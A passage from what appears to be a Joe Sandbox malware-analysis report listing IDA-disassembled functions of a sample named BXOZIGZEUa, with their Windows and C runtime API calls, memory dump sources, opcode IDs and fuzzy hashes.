                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Default$ConvertLocale$Language$AddressExtensionFileFindModuleNamePathProcSystemUser_memset_wcslen_wcstoul
                                                              • String ID: %s%s.dll
                                                              • API String ID: 1415830068-1649984862
                                                              • Opcode ID: 5fb110d385413de1f9dfaa9c57a86219a00955feaeef0219459b04537c1a97bd
                                                              • Instruction ID: 443a4b0b24180e14b7a3b079a361ea9272190bf5bbe8ea6fedd7b87ad6270b08
                                                              • Opcode Fuzzy Hash: 5fb110d385413de1f9dfaa9c57a86219a00955feaeef0219459b04537c1a97bd
                                                              • Instruction Fuzzy Hash: A401A272A00108ABCB01DFA8EC89DFF77E9EF49300F0004BAA509E7250EA749E45CB94
                                                              APIs
                                                              • _strcpy_s.LIBCMT ref: 005D637B
                                                              • __invoke_watson.LIBCMT ref: 005D63CF
                                                                • Part of subcall function 005D620A: _strcat_s.LIBCMT ref: 005D6229
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: __invoke_watson_strcat_s_strcpy_s
                                                              • String ID: -g]
                                                              • API String ID: 312943863-4038253704
                                                              • Opcode ID: 117d6c5dede76610d39dd324e0546458fefc940fb11ed62c4ca2333bbf63c885
                                                              • Instruction ID: 112a4547dda903d3883708b928178f3badd20d4f62e1d65efcb13e3674124a14
                                                              • Opcode Fuzzy Hash: 117d6c5dede76610d39dd324e0546458fefc940fb11ed62c4ca2333bbf63c885
                                                              • Instruction Fuzzy Hash: D2F0C2B24403497FCF216E58CC06D9A3F1ABB40350F4A8463FA194A252E332CE65D750
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005A36E8
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 005A3721
                                                                • Part of subcall function 004D94E4: ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ActivateAddressH_prolog3Proc
                                                              • String ID: UxTheme.dll
                                                              • API String ID: 323876227-352951104
                                                              • Opcode ID: 17b700ee36d2fa32ad7c5b6190c5de4d2b301f2401f70756fb763870fc1c9c2d
                                                              • Instruction ID: c05894e57a508b06508ff6d96833bae8740d3acfe09318563b6b77dbb2176b6b
                                                              • Opcode Fuzzy Hash: 17b700ee36d2fa32ad7c5b6190c5de4d2b301f2401f70756fb763870fc1c9c2d
                                                              • Instruction Fuzzy Hash: 30E0EDB96043054FCB10AFB89D0AB2C3FD4FB02718F045008F800D72A0CB78DB808B04
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
                                                              • InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
                                                              • LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
                                                              • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                              • String ID:
                                                              • API String ID: 2895727460-0
                                                              • Opcode ID: 0656a1547aec08de0acf4e3cc630cda7bb4a81c362f944952c364c34daddf5ea
                                                              • Instruction ID: c1555e8ba94d06414e142f729806f180815ef148f5b8c0ed7172170249bb2ccd
                                                              • Opcode Fuzzy Hash: 0656a1547aec08de0acf4e3cc630cda7bb4a81c362f944952c364c34daddf5ea
                                                              • Instruction Fuzzy Hash: 91F0FCB2900214AFCB146F56DC49725B75BEBF1796F021417F54043361DA3C9945CA69
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(00643518,?,?,00000000,?,004E1699,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E11D3
                                                              • TlsGetValue.KERNEL32(006434FC,?,?,00000000,?,004E1699,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E11E7
                                                              • LeaveCriticalSection.KERNEL32(00643518,?,?,00000000,?,004E1699,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E11FD
                                                              • LeaveCriticalSection.KERNEL32(00643518,?,?,00000000,?,004E1699,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E1208
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Leave$EnterValue
                                                              • String ID:
                                                              • API String ID: 3969253408-0
                                                              • Opcode ID: 28baf010b8a3b53257029994002e7313b14a349b74314f68f1aa587e785e67d9
                                                              • Instruction ID: db99d36dd65c7ed2e61d7710941ebe0c91dc568b82f5bbc505ba2cd533e4f50d
                                                              • Opcode Fuzzy Hash: 28baf010b8a3b53257029994002e7313b14a349b74314f68f1aa587e785e67d9
                                                              • Instruction Fuzzy Hash: 6AF0B4322402049FCB208F56DC48C3B77A9EB957673194956F542E7231CA39F809DA54